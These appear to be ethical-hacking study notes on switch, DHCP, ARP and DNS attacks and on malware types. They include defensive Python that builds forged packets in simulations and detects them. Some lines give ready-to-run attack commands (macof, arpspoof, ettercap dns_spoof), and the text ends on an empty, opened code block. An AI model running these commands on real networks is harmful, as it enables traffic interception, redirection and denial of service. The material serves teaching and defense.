      • ARP Poisoning: involves constructing a large number of forged ARP request and reply packets to overload a switch.
      • DHCP Attacks: involve performing a DHCP starvation attack and a rogue DHCP server attack.
      • Switch port stealing: involves flooding the switch with forged gratuitous ARP packets with the target MAC address as the source.
      • Spoofing Attack: involves performing MAC spoofing, VLAN hopping, and STP attacks to steal sensitive information.
  • Basic attacks:

    • MAC flooding using macof: technique used to compromise the security of network switches that connect network segments or network devices. Attackers use the MAC flooding technique to force a switch to act as a hub, so they can easily sniff the traffic.
      • macof is a Unix and Linux tool that is part of the dsniff collection. It floods the local network with random MAC addresses and IP addresses, causing some switches to fail open in repeating mode, thereby facilitating sniffing. The tool floods the switch’s CAM table (131,000 entries per minute) by sending forged MAC entries. When the MAC table fills up, the switch falls back to hub-like operation, where an attacker can monitor the data being broadcast (macof -i eth0 -d [Target IP Address]).
    • VLAN hopping attack: an attacking host on a VLAN (Virtual LAN, a logical segment of the shared network) gains access to traffic on other VLANs. You may use Frogger.
      • Switch spoofing: the attacking host imitates a trunking switch.
      • Double tagging:
        1. The attacker prepends two VLAN tags to frames.
        2. The second (inner) tag identifies the target host’s VLAN.
        3. The first switch removes the first, innocuous VLAN tag and forwards the frame to the second switch.
        4. This bypasses security mechanisms and reaches the target hosts.
        5. Replies are not forwarded back to the attacker’s host (the attack is one-way).
    • STP (Spanning Tree Protocol) attack:
      • Definition: an attack on the Spanning Tree Protocol (STP, the protocol that ensures a loop-free topology in Ethernet networks by preventing the loops that can occur in redundant switch configurations) to manipulate the network topology. STP uses BPDUs (Bridge Protocol Data Units) to communicate between switches and elect a root bridge, which determines the shortest paths and disables redundant links.
      • Method: An attacker sends spoofed STP BPDUs (Bridge Protocol Data Units) to become the root bridge.
      • Effect: Can reroute traffic through the attacker’s device, enabling data interception and network disruption.

DHCP sniffing attacks

An attacker floods the DHCP server by sending a large number of DHCP requests and uses all available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a Denial-of-Service (DoS) attack. Because of this issue, valid users cannot obtain or renew their IP addresses, and thus fail to access their network. This attack can be performed by using various tools such as Yersinia and Hyenae.

  • DORA process: the four-step exchange by which a device obtains an IP address from a DHCP server: DISCOVER, OFFER, REQUEST, ACKNOWLEDGE.

  • Attacks:

    1. DHCP Starvation Attack

      • Definition: an attacker sends numerous DHCP requests with spoofed MAC addresses to exhaust the DHCP server’s pool of IP addresses.
      • Effect: legitimate clients cannot obtain IP addresses, leading to denial of service.
      • Method: the attacker uses tools like dhcpstarv to automate the process of sending fake DHCP requests.
    2. DHCP Spoofing Attack:

      • Definition: an attacker sets up a rogue DHCP server on the network to respond to DHCP requests from clients.
      • Effect: the rogue server can assign malicious IP addresses, gateways, or DNS servers, redirecting traffic and intercepting data.
      • Method: the attacker listens for DHCP requests and responds faster than the legitimate DHCP server.
    3. DHCP Lease Hijacking:

      • Definition: an attacker monitors the network for DHCP requests and responses, then sends a DHCP request to lease an IP address intended for a legitimate client.
      • Effect: the attacker can impersonate the legitimate client, intercepting their traffic and gaining unauthorized access.
      • Method: the attacker needs to be quick to send the request before the legitimate client.
  • Tools:

    • Yersinia: network tool that can launch various DHCP attacks, including spoofing and starvation, by taking advantage of weaknesses in different network protocols such as DHCP. It is intended as a framework for analyzing and testing deployed networks and systems (interactive mode: yersinia -I).
    • dhcpstarv: automates DHCP starvation attacks.
    • dhcpxflood: Another tool for flooding a network with DHCP requests.
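As an added example (not part of the original notes or of any of the tools above), the following Python builds DHCP DISCOVER messages the way a starvation tool does, with a different spoofed chaddr in each, and applies the two checks a switch's DHCP snooping feature performs: the client hardware address must match the Ethernet source MAC, and an untrusted port gets a DISCOVER rate limit. The frame layout follows RFC 2131; the sample traffic, the port numbers and the rate limit of 5 are constructed for the demonstration.

```python
"""DHCP DISCOVER builder plus DHCP-snooping style checks (added example)."""
import struct
from collections import defaultdict

DHCP_MAGIC = b"\x63\x82\x53\x63"   # RFC 2131 option-field magic cookie
DHCPDISCOVER = 1


def build_discover(chaddr: bytes, xid: int) -> bytes:
    """Minimal DHCPDISCOVER: BOOTP fixed header (236 bytes) + options."""
    assert len(chaddr) == 6
    hdr = struct.pack("!BBBB", 1, 1, 6, 0)          # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops=0
    hdr += struct.pack("!IHH", xid, 0, 0x8000)      # xid, secs, flags (broadcast bit set)
    hdr += b"\x00" * 16                             # ciaddr, yiaddr, siaddr, giaddr
    hdr += chaddr + b"\x00" * 10                    # chaddr, padded to 16 bytes
    hdr += b"\x00" * 192                            # sname (64) + file (128)
    opts = DHCP_MAGIC
    opts += bytes([53, 1, DHCPDISCOVER])            # option 53: DHCP message type
    opts += bytes([55, 3, 1, 3, 6])                 # option 55: request subnet mask, router, DNS
    opts += b"\xff"                                 # END option
    return hdr + opts


def parse_dhcp(pkt: bytes):
    """Return (xid, chaddr, message_type); raise ValueError if this is not DHCP."""
    if len(pkt) < 240 or pkt[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    hlen = pkt[2]
    xid = struct.unpack("!I", pkt[4:8])[0]
    chaddr = pkt[28:28 + hlen]
    msg_type, i = None, 240
    while i < len(pkt) and pkt[i] != 0xFF:          # walk the TLV options until END
        if pkt[i] == 0:                             # PAD option has no length byte
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        if code == 53:
            msg_type = pkt[i + 2]
        i += 2 + length
    return xid, chaddr, msg_type


def snoop(frames, rate_limit=5):
    """frames: iterable of (switch_port, eth_src_mac, dhcp_payload).

    Two checks modelled on DHCP snooping: (1) chaddr must equal the Ethernet
    source MAC (a flooder that only spoofs chaddr fails this); (2) more than
    `rate_limit` DISCOVERs from one untrusted port raises an alert, once."""
    alerts, per_port = [], defaultdict(int)
    for port, eth_src, payload in frames:
        try:
            _, chaddr, mtype = parse_dhcp(payload)
        except ValueError as exc:
            alerts.append((port, "malformed", str(exc)))
            continue
        if mtype != DHCPDISCOVER:
            continue
        per_port[port] += 1
        if chaddr != eth_src:
            alerts.append((port, "chaddr-mismatch", chaddr.hex(":")))
        if per_port[port] == rate_limit + 1:
            alerts.append((port, "rate-limit", f"port {port} exceeded {rate_limit} DISCOVERs"))
    return alerts


def sample_frames():
    """Constructed traffic: one legitimate client on port 1, then a starvation
    burst from port 7 whose chaddr changes every frame while the attacker's real
    Ethernet source MAC stays the same."""
    legit = bytes.fromhex("00112233aabb")
    frames = [(1, legit, build_discover(legit, 0x1001))]
    attacker = bytes.fromhex("deadbeef0011")
    for n in range(20):
        spoofed = bytes([0x02, 0x00, 0x00, 0x00, 0x00, n])   # locally administered, fake client
        frames.append((7, attacker, build_discover(spoofed, 0x2000 + n)))
    return frames


if __name__ == "__main__":
    for alert in snoop(sample_frames()):
        print(alert)
```

The mismatch check only catches tools that spoof the chaddr field but not the frame's source MAC; a flooder that spoofs both is caught by the per-port rate limit, which is why switches apply both.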

ARP poisoning

  • ARP is the Address Resolution Protocol: it resolves IPv4 addresses to MAC addresses and can be used to enumerate the MAC addresses of devices on the local network.

    • Packets are ARP_REQUEST and ARP_REPLY.
    • Commands:
      • arp -a: displays current ARP cache.
      • arp -d *: clears ARP cache.
  • ARP table (cache): maps IP addresses to MAC addresses. Every network interface keeps its own table.

    • If no ARP entry exist:
      1. Computer A broadcasts an ARP request on the network asking which MAC address owns a specific IP.
      2. Computer B replies with its MAC address (and IP).
      3. Computer A inserts it to its ARP table for future use
  • ARP spoofing (poisoning): attack against an Ethernet LAN. ARP has no authentication and hosts accept replies they never requested, so the attacker sends forged ARP replies that bind the target's IP address (typically the gateway's) to the attacker's MAC address. Once the forged binding sits in the victim's ARP cache, frames meant for the target are delivered to the attacker, who can read or modify them before forwarding them to the real destination, a man-in-the-middle (MITM) attack.

  • Tools: arpspoof (from dsniff) redirects packets from a target host (or all hosts) on the LAN that are intended for another host by forging ARP replies. This is an extremely effective way of sniffing traffic on a switched network; IP forwarding must be enabled on the attacking machine, otherwise the intercepted traffic is dropped instead of relayed.

    arpspoof -i eth0 -t 10.10.1.1 10.10.1.11
    # -i: network interface to send on
    # -t: target whose ARP cache is poisoned (10.10.1.1)
    # last argument: host to impersonate (10.10.1.11); the target is told that
    # 10.10.1.11 is at the attacker's MAC address
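The following Python is an added example, not code from the notes or from dsniff: it builds Ethernet/ARP frames the way a spoofer does and runs a small ARP-watch detector over them. The detector learns IP-to-MAC bindings from replies and alerts on an unsolicited reply, a changed binding, or a reply that contradicts a pinned static entry (the static-ARP mitigation listed under sniffing defenses). The addresses and the sequence of frames are constructed for the demonstration.

```python
"""Ethernet/ARP frame construction and an ARP-poisoning detector (added example)."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def ip(text: str) -> bytes:
    return bytes(int(o) for o in text.split("."))


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header (14 bytes) + ARP for IPv4 over Ethernet (28 bytes, RFC 826).
    A forged reply is simply sender_ip = the host being impersonated, sender_mac = attacker."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = eth_dst + sender_mac + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)     # htype, ptype, hlen, plen, opcode
    return eth + arp + sender_mac + sender_ip + target_mac + target_ip


def parse_arp(frame: bytes):
    """Return the ARP fields as a dict, or None if this is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": frame[6:12], "op": op, "sender_mac": frame[22:28],
            "sender_ip": frame[28:32], "target_mac": frame[32:38], "target_ip": frame[38:42]}


class ArpWatch:
    """Learn IP->MAC bindings from replies and flag the classic poisoning signs.

    static: {ip_bytes: mac_bytes} entries that are pinned and never overwritten,
    modelling a static ARP entry for the gateway."""

    def __init__(self, static=None):
        self.table = dict(static or {})
        self.static = set(self.table)
        self.pending = set()          # target IPs of requests seen going out
        self.alerts = []

    def feed(self, frame: bytes):
        a = parse_arp(frame)
        if a is None:
            return
        if a["op"] == ARP_REQUEST:
            self.pending.add(a["target_ip"])
            return
        if a["op"] != ARP_REPLY:
            return
        sip, smac = a["sender_ip"], a["sender_mac"]
        if a["eth_src"] != smac:                     # ARP payload disagrees with the frame header
            self.alerts.append(("eth-src-mismatch", sip, smac))
        if sip in self.pending:
            self.pending.discard(sip)
        else:                                        # nobody asked: gratuitous or forged reply
            self.alerts.append(("unsolicited-reply", sip, smac))
        known = self.table.get(sip)
        if known is None:
            self.table[sip] = smac
        elif known != smac:
            if sip in self.static:
                self.alerts.append(("static-entry-violation", sip, smac))   # pinned, not updated
            else:
                self.alerts.append(("binding-changed", sip, smac))
                self.table[sip] = smac               # an unprotected cache is overwritten too


def sample_session():
    """Constructed LAN traffic: a victim resolves the gateway normally, then an
    attacker forges a reply claiming the gateway IP with its own MAC."""
    gw_mac, victim_mac = mac("00:00:5e:00:01:01"), mac("08:00:27:aa:bb:cc")
    atk_mac = mac("de:ad:be:ef:00:11")
    gw_ip, victim_ip = ip("10.10.1.1"), ip("10.10.1.2")
    return [
        build_arp(ARP_REQUEST, victim_mac, victim_ip, b"\x00" * 6, gw_ip),
        build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),
        build_arp(ARP_REPLY, atk_mac, gw_ip, victim_mac, victim_ip),   # the poisoning frame
    ]


def run(static=None) -> ArpWatch:
    watch = ArpWatch(static)
    for frame in sample_session():
        watch.feed(frame)
    return watch


if __name__ == "__main__":
    print(run().alerts)                                               # cache gets overwritten
    print(run({ip("10.10.1.1"): mac("00:00:5e:00:01:01")}).alerts)   # static entry holds
```

Without the static entry the detector can only report that the gateway binding changed after the cache has already been poisoned; with it, the forged reply is rejected and reported as a violation of the pinned entry.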

DNS poisoning

DNS Poisoning, also known as DNS Cache Poisoning, is an attack technique used to redirect traffic from a legitimate domain to a malicious IP address. This allows attackers to capture sensitive information or perform phishing attacks. It exploits the DNS resolution process, manipulating DNS cache or settings.

  • DNS resolution process:

    1. Local check: the resolver first checks whether the name is the machine's own hostname.
    2. Resolver cache: cached answers from earlier lookups.
    3. Hosts file: static entries (e.g., /etc/hosts on Linux, C:\Windows\System32\drivers\etc\hosts on Windows).
    4. DNS server: otherwise the query goes to the configured recursive resolver, which in turn queries the root, TLD and authoritative servers as needed.
  • Attack Techniques:

    1. Hosts file modification: malware or an attacker edits the local hosts file to redirect domains.
    2. Malicious DNS server configuration: attackers push a rogue resolver address to clients, e.g. via spoofed DHCP responses, so every query is answered by them.
    3. Cache poisoning: forged responses inject fake records into a resolver's cache, so every client of that resolver is redirected for as long as the record's TTL lasts.
  • Tools for DNS poisoning:

    • Ettercap: commonly used for man-in-the-middle attacks, DNS spoofing, and other network-based attacks.
      # on the Windows victim, flush the resolver cache so the spoofed answer is the one used
      ipconfig /flushdns
      # on the attacker, add the records to forge to etter.dns (one per line: name, record type, value),
      # then ARP-poison the LAN (-M arp, targets // // = all hosts) and load the dns_spoof plugin
      sudo ettercap -T -q -i <interface> -P dns_spoof -M arp // //
      # -T: text interface, -q: quiet (no packet dump), -i: interface, -P: plugin to load
    • DerpNSpoof: a lightweight command-line tool for DNS spoofing and poisoning.
    • Bettercap: an alternative to Ettercap, providing DNS spoofing features.
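As an added example (not from the notes, Ettercap or any of the tools listed), the Python below encodes DNS queries and answers on the wire, builds the forged response a cache poisoner sends, and runs it against two toy resolvers: one that accepts any answer whose 16-bit transaction ID matches an outstanding query (and ignores which port the reply arrived on), and one that additionally requires the reply to arrive on the randomised source port of that query, to answer the same question, and ignores records for other names. The names, addresses and ports are constructed; the wire format follows RFC 1035.

```python
"""DNS wire format, a forged answer, and two resolver acceptance policies (added example)."""
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    """Decode labels, following compression pointers. Returns (name, offset_after_name)."""
    labels, end = [], None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                               # pointer into the message
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def build_query(txid: int, name: str) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)    # RD=1, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_response(txid: int, name: str, ipv4: str, ttl: int = 300) -> bytes:
    """A single A record answering `name`. A poisoner sends exactly this with a guessed txid."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)    # QR=1 RD=1 RA=1, 1 question, 1 answer
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    rdata = bytes(int(o) for o in ipv4.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse(msg: bytes) -> dict:
    txid, _flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                                     # skip qtype, qclass
    answers = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return {"txid": txid, "qname": qname, "answers": answers}


class Resolver:
    """strict=False: accept any reply whose txid matches an outstanding query (65 536 guesses).
    strict=True: also require the reply to arrive on the query's random source port and to
    answer the same name, and ignore records for other names (bailiwick check)."""

    def __init__(self, strict: bool):
        self.strict, self.outstanding, self.cache = strict, {}, {}

    def send(self, txid: int, src_port: int, qname: str) -> bytes:
        self.outstanding[txid] = (src_port, qname)
        return build_query(txid, qname)

    def receive(self, msg: bytes, arrived_on_port: int) -> str:
        reply = parse(msg)
        entry = self.outstanding.get(reply["txid"])
        if entry is None:
            return "dropped: unknown txid"
        port, qname = entry
        if self.strict and (arrived_on_port != port or reply["qname"] != qname):
            return "dropped: port or question mismatch"
        for name, _ttl, addr in reply["answers"]:
            if self.strict and name != qname:
                continue
            self.cache[name] = addr
        del self.outstanding[reply["txid"]]
        return "accepted"


def poisoning_attempt(strict: bool):
    """Constructed race: the resolver queries www.example.com from port 40123; the attacker
    has guessed txid 0xBEEF but sprays replies at port 53 before the real answer arrives."""
    resolver = Resolver(strict)
    resolver.send(0xBEEF, 40123, "www.example.com")
    forged = build_response(0xBEEF, "www.example.com", "203.0.113.66")
    verdict = resolver.receive(forged, arrived_on_port=53)
    return verdict, resolver.cache.get("www.example.com")


if __name__ == "__main__":
    print("txid-only resolver:", poisoning_attempt(strict=False))
    print("port + question check:", poisoning_attempt(strict=True))
```

The port check multiplies the attacker's guessing space from 2^16 to roughly 2^32; DNSSEC (below) closes the remaining gap by letting the resolver verify a signature instead of relying on unguessable fields.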

Mitigations

  • Use DNSSEC: responses are digitally signed by the zone owner, so a validating resolver rejects forged or altered records (DNSSEC authenticates answers; it does not encrypt queries).
  • Enable DNS security features: DNS filtering, source-port randomisation and response validation in the resolver.
  • Secure DNS settings: lock down resolver configuration and the hosts file so they cannot be modified without authorisation.

Sniffing defenses

  • Restrict physical access to the network media.
  • Encryption is, by far, the best option: sniffed traffic that is encrypted yields nothing usable.
  • Use Access Control Lists (ACLs) on routers/firewalls to allow only authorised devices/IP ranges.
  • Add a static (permanent) ARP entry for the gateway so forged replies cannot overwrite it.
  • Use static IP addresses and static ARP tables where the network is small enough to manage them.
  • Use switches rather than hubs: a switch delivers frames only to the intended recipient's port (although ARP poisoning and MAC flooding can still defeat this).
  • Use PGP and S/MIME, VPN, IPsec (a cryptographic tunnelling protocol), SSL/TLS, Secure Shell (SSH) and one-time passwords (OTP).
  • Retrieve the MAC address directly from the NIC instead of from the OS to detect MAC address spoofing.
  • Use tools to determine whether any NIC is running in promiscuous mode.

Malware concepts and components

Short for “malicious software”: any software that performs harmful actions on a computer system or network. It takes many forms; all viruses are malware, but not all malware is a virus.

  • Common types:

    • Trojan: appears innocuous or even useful but contains hidden malicious code (e.g., like a Tootsie Pop with smallpox inside).
    • Virus: malicious program that attaches to a host file and needs a human action (opening an email attachment, running a program from a USB drive) to execute and spread to other files.
    • Worm: similar to viruses but can propagate itself without human interaction. Worms often exploit vulnerabilities like remote code execution (RCE).
    • Ransomware: encrypts a victim’s data and demands payment (often in Bitcoin) for decryption. Example: WannaCry.
    • Adware: software that displays unwanted advertisements, often gathering data on your habits. It may not be strictly malicious but is often annoying and invasive.
    • Spyware: gathers information about users without consent, from browsing habits sold to advertisers up to keystrokes and credentials.
  • Components:

    • Downloader: small first-stage program, often innocuous-looking, that fetches the real payload from a remote server.
    • Dropper: contains malicious code and installs malware onto the target system.
    • Obfuscator: makes the malware code unreadable to prevent detection by security systems.
    • Cryptor: encrypts malware code to prevent analysis; the code must be decrypted to understand its function.
    • Payload: actual malicious action the malware carries out (e.g., encrypting files, exfiltrating data).
    • Exploit: code that abuses a vulnerability in software so the malware can run or spread (e.g., EternalBlue, used by WannaCry).
  • Propagation methods:

    1. Email Attachments: A common way for malware to spread is via malicious email attachments or links.
    2. Software Installations from Untrusted Sources: Downloading software from torrents or other untrusted sources can lead to malware infections.
    3. Exploiting Software Vulnerabilities: Malware can use known vulnerabilities in software to spread automatically (e.g., EternalBlue in WannaCry).
  • Real-world examples

    • Ransomware: targets industries like healthcare and education. The shift from encrypting files to exfiltrating data and threatening to release it on the dark web is becoming more common.
    • Famous cases: BlackEnergy, CryptoLocker-style ransomware, and the Equation Group's tooling. The GitHub repository “theZoo” hosts real-world malware samples for analysis (e.g., samples attributed to Fancy Bear, Petya, WannaCry).

APT

Advanced Persistent Threats (APTs) are sophisticated, long-running campaigns run by well-organised, highly skilled groups with specific objectives such as data exfiltration, espionage or financial gain. They often use malware built for the campaign, including custom zero-day exploits. Many APT groups are state-sponsored; Stuxnet is an example of state-sponsored malware, but a single piece of malware is not itself an APT: the term refers to the actor and its campaign.

  • Key characteristics:

    • Advanced: high-level skills and custom exploits are often used.
    • Persistent: they maintain long-term access to the target systems.
    • Threat: their goal is to execute malicious activities without being detected.
  • Groups: see MITRE APT Groups.

    • APT28 (Fancy Bear): Russian state-sponsored group.
    • Lazarus Group: North Korean group; APT38 is the financially motivated cluster associated with it.
    • Lapsus$: non-state group, notable for breaching companies such as Okta and Nvidia.
  • Targets:

    • Sensitive Information: personal or state secrets, intellectual property, and financial data.
    • Corporate Espionage: stealing research and development information to gain a competitive advantage.
    • Political Goals: activists may engage in politically motivated attacks.
  • Behavior:

    • Long-Term Access: APTs aim to stay undetected for as long as possible, often going unnoticed until they strike.
    • Patience: Attackers are methodical and patient, gathering intelligence over time before launching their attack.
    • High Skill Level: attackers are highly skilled in areas such as zero-day exploit development, evading detection, and using multi-stage attacks.
  • Lifecycle:

    1. Preparation:
      • Target selection: intelligence gathering on the organisation, its people and its technology stack.
      • Tool creation: developing custom malware and testing it against the defences likely to be in place (EDR, AV) so that it evades detection.
    2. Initial Intrusion: deploying malware and establishing a connection to the target system.
    3. Expansion: gaining further access by acquiring credentials and expanding across the network.
    4. Persistence: maintaining long-term access through various persistence techniques.
    5. Exfiltration: gathering and transferring sensitive information to external systems controlled by the attackers.
    6. Cleanup: covering tracks by erasing log files and removing evidence of the intrusion.

Trojans

  • Definition: type of malware that masquerades as legitimate software but contains a malicious payload. The name is derived from the Greek myth of the Trojan Horse, where enemies hid inside to infiltrate the city. In the case of Trojans, the “horse” is digital.

    • Function: Malicious software disguised as a legitimate program to trick users into installing it.
    • Propagation: Does not self-replicate; relies on social engineering to spread.
  • Design: several kinds of malicious software exist to install other malware on a target system. The differences between them:

    • Dropper:
      • Function: a dropper is a type of malware designed to install another malicious payload on the victim’s system. It typically carries the malicious payload within its own code.
      • Operation: once executed, the dropper extracts and installs the payload directly onto the system.
      • Payload Delivery: the payload is usually embedded within the dropper itself, making it a self-contained malware delivery mechanism.
    • Downloader:
      • Function: A downloader is a type of malware that, upon execution, retrieves additional malicious software from the internet or another network location.
      • Operation: The downloader contacts a remote server to download the additional malware, which it then installs on the system.
      • Payload Delivery: Unlike droppers, downloaders do not contain the malicious payload initially; they fetch it from an external source after being executed.
    • Cryptors: tools or components used to encrypt malicious payloads. The primary purpose of a cryptor is to obfuscate malware to evade detection by antivirus software and other security mechanisms. Cryptors work by transforming the code of the malware into a format that is not recognizable by signature-based detection methods. Once the encrypted payload reaches the target system, the cryptor decrypts it, allowing the malware to execute.
    • Key differences:
      • Embedded payload: droppers carry the payload within themselves, while downloaders fetch it from an external location.
      • Network activity: downloaders need network access to retrieve the second stage, whereas droppers do not necessarily need it.
  • Types:

    • Remote Access Trojans (RATs).
    • Mobile trojans.
    • IoT botnet trojans.
    • Banking trojans.
    • Denial of Service trojans.
    • Backdoor trojans.
  • Purpose: trojans are used for a variety of malicious activities, including:

    • Disabling Firewalls/IDS to gain deeper access.
    • Installing More Malware as a prelude to further attacks like ransomware.
    • Establishing Command and Control (C2) communications for remote control.
    • Spying via keystroke logging, camera/audio hijacking, and browsing monitoring.
    • Blackmail/Extortion based on sensitive activities.
    • Storage Theft by using a victim’s device to store malicious data.
    • Destruction via “wipers” that erase data or disable the system.
    • Denial of Service (DoS) attacks or botnet creation.
    • Theft of sensitive data (PII, PHI, financials).
  • Deploy methods:

    • Dropper: first-stage program, itself harmless-looking, that carries the Trojan inside it and writes it to disk.
    • Downloader: first-stage program that fetches the second-stage Trojan from a remote source.
    • Wrapper: binds the Trojan to a legitimate-looking application so that both run when the user launches it.
    • Cryptor: encrypts the malicious code to evade antivirus signatures and decrypts it in memory at runtime.
  • Infection methods: trojans are often spread through social engineering tactics, such as:

    • Malicious Links: Emails or websites that trick users into clicking a link or downloading an attachment.
    • Macros: Embedded in documents that, when opened, execute the malicious code.
    • Fake Software: Promises of free software that instead install a Trojan (e.g., fake media player or games).

Viruses and worms

  • Concepts:

    • Virus: malicious software that attaches itself to a host file or program. It is self-replicating but requires human interaction (e.g., clicking on a file) to activate. Once activated, it spreads to other files.
    • Worm: self-replicating malware that spreads independently through software vulnerabilities without requiring human interaction.
  • Goals:

    • Destruction of systems.
    • Cyber theft.
    • Hacktivism.
    • Chaos or “watching the world burn”.
  • Symptoms of infection:

    • Poor system performance (e.g., high CPU usage, disk space depletion).
    • Random system crashes.
    • Missing data or deleted files (e.g., documents).
  • Lifecycle:

    1. Design: virus developers design and build the new virus.
    2. Replication: the virus copies itself to new files or systems.
    3. Launch: the virus is executed when a user runs an infected file.
    4. Detection: security teams discover and analyse the virus.
    5. Incorporation: antivirus vendors add signatures so their products detect and block it.
    6. Execution of the damage routine / elimination: the virus carries out its payload on hosts that are still infected, while users install the antivirus update and remove it.
  • Common types:

    • Boot Sector Viruses: Infect boot sectors of disks. Example: “Elk Cloner.”
    • File-Level Viruses: Spread through infected files. Example: Attachments or programs that carry viruses.
    • Macro Viruses: Exploit application macros (e.g., Excel, Word) to run malicious code.
  • Advanced types:

    • Polymorphic viruses: re-encrypt their body with a varying key so that each copy has a different signature while doing the same work once decrypted.
    • Metamorphic viruses: rewrite their own code on each infection, changing their structure as well as their bytes.
    • Logic bombs: malicious code that triggers on a specific event or date.
    • Ransomware: malware that encrypts files and demands payment for the key (e.g., WannaCry, CryptoLocker); it typically spreads as a worm or Trojan rather than as a classic file-infecting virus.

Fileless malware

In plain terms: the malicious code is loaded and executed in memory and is never written to disk as a file.

  • Characteristics:

    • No Files on Disk: Operates without leaving files on the hard drive.
    • Memory-Resident: Persists in the system’s RAM.
    • Leverages Legitimate Tools: Uses built-in system tools like PowerShell, WMI (Windows Management Instrumentation), and macros within Office documents.
    • Evades Detection: Bypasses traditional antivirus solutions that scan for malicious files on disk.
  • Attack vectors:

    1. Phishing emails: contain malicious links or attachments that, when opened, execute fileless malware.
    2. Exploiting vulnerabilities: utilizes security flaws in software to execute code directly in memory.
    3. Malicious Macros: embedded in documents (e.g., Word or Excel) that execute scripts when the document is opened.
    4. PowerShell Scripts: PowerShell commands or scripts executed to perform malicious activities.
  • Entry Points for Fileless Malware:

    • Exploits: File-based or fileless payloads.
    • Network-Based: Exploiting remote vulnerabilities (e.g., buffer overflow).
    • Hardware: Malware targeting firmware of devices.
    • Execution and Injection:
      • File-based: Executables used in memory.
      • Macro-based: VBA macros, often in Word/Excel files.
      • Script-based: PowerShell, Bash, Python, etc.
      • Disk-based: Rootkit infections through boot records.
  • Process of infection:

    1. Entry Point: Exploits like EternalBlue, phishing emails, or malicious websites.
    2. Code Execution: Uses scripts (e.g., PowerShell, WMIC) to execute malicious actions.
    3. Persistence: Maintains access via registry entries or scheduled tasks.
    4. Objectives: Data exfiltration, reconnaissance, or cyber espionage.
  • Common tactics: attackers often obfuscate their code by modifying characters or using legitimate processes to avoid detection by security systems. This approach enables fileless malware to execute without leaving traces on disk, making it difficult for traditional security solutions to detect.

  • Classification:

    • By evidence left on disk:
      • No file activity: the payload exists only in memory.
      • Indirect file activity: legitimate files that belong on the system are modified to launch malicious code, which still runs only in memory.
      • Files required: a file that is itself harmless and raises no alarms, but which reaches out to the internet, fetches the malicious content and loads it straight into memory, so nothing malicious touches the disk.
    • By Entry Points:
      • Exploits & Network-based.
      • Hardware: eg. Spreading through infected USB drives.
      • Execution & Injection (macro based, script based, disk based).
  • Types: fileless malware can be categorized based on the techniques it employs and the components it targets:

    1. Memory-Resident Malware: operates entirely in memory without writing files to the disk (e.g. worms that propagate through network connections and remain in the RAM of infected systems).
    2. Script-Based Malware: uses scripts (e.g., PowerShell, JavaScript, VBScript) to execute malicious activities.
    3. Registry-Resident Malware: stores malicious code or scripts in the Windows Registry for persistence (e.g. a base64-encoded PowerShell command kept in a registry value and launched at logon through a living-off-the-land binary such as regsvr32.exe).
    4. Reflective DLL Injection: injects Dynamic Link Libraries (DLLs) directly into the memory of running processes without writing to disk (e.g. DLL injection).
    5. Living off the Land (LoL) Attacks: exploits legitimate system tools and software to carry out malicious activities (e.g. using wmic.exe, powershell.exe, or mshta.exe to download and execute malicious scripts).
    6. Office Document Macros: embeds malicious macros in Office documents (e.g., Word, Excel) that execute when the document is opened (e.g. Word document with a malicious VBA macro that executes PowerShell commands).
    7. Bootkits: reside in the system’s boot sector or bootloader, often leveraging firmware or system-level exploits (e.g. infect the Master Boot Record (MBR) to load its payload directly into memory during the boot process).
    8. Browser-Based Fileless Malware: executes through web browsers using malicious scripts or exploits delivered via websites (e.g. JavaScript payload).
  • Examples

    1. Poweliks: uses registry keys to store and execute malicious PowerShell scripts.
    2. SamSam: ransomware that exploits vulnerabilities to run in memory and encrypt files.
    3. Kovter: ad-fraud malware that maintains persistence through registry manipulation.
    4. Powersniff: uses malicious PowerShell scripts to download and execute payloads directly in memory.
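As an added example (not from the notes or from any of the malware families named above), the Python below does the detection work an analyst would script for this class of malware: it parses process-creation records, decodes a PowerShell `-EncodedCommand` payload (Base64 of UTF-16LE text), and flags living-off-the-land binaries, download cradles, in-memory execution idioms, stealth flags and Office parents spawning script hosts. The record format, hostnames and URLs are constructed for the demonstration; real input would be Sysmon Event 1 or Security Event 4688 command lines.

```python
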